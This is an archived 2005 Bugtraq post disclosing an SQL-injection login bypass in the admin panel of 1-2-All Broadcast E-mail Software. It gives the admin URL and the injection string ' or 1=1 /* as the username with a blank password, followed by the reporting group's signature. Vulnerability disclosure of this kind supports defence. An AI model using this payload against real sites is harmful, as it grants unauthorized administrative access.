[41183] in bugtraq

home help back first fref pref prev next nref lref last post

1-2-All Broadcast E-mail Software vulnerable to a classic SQL admin

daemon@ATHENA.MIT.EDU (bhs_team@yahoo.com)
Mon Nov 14 18:59:03 2005

Date: 11 Nov 2005 19:52:41 -0000
Message-ID: <20051111195241.11642.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: bhs_team@yahoo.com
To: bugtraq@securityfocus.com

1-2-All Broadcast E-mail Software ( POC )
Supplying the following is sufficient to gain access to the admin control panel:

Target :

http://www.example.com/[12allTarget]/admin/index.php


Username: ' or 1=1 /*
Password: (Nothing)(Blank)


Report By : POPO
>From>IRAN> www.Babol-Hackers.com
bhs_team@yahoo.com
Y! ID : bhs_team , pooya_0nline
-----------------------------------
BHS-Team

We Are : POPO + Padeshah  + Black ICE + Ezraeil + UNDERTAKER + Fa0p

home help back first fref pref prev next nref lref last post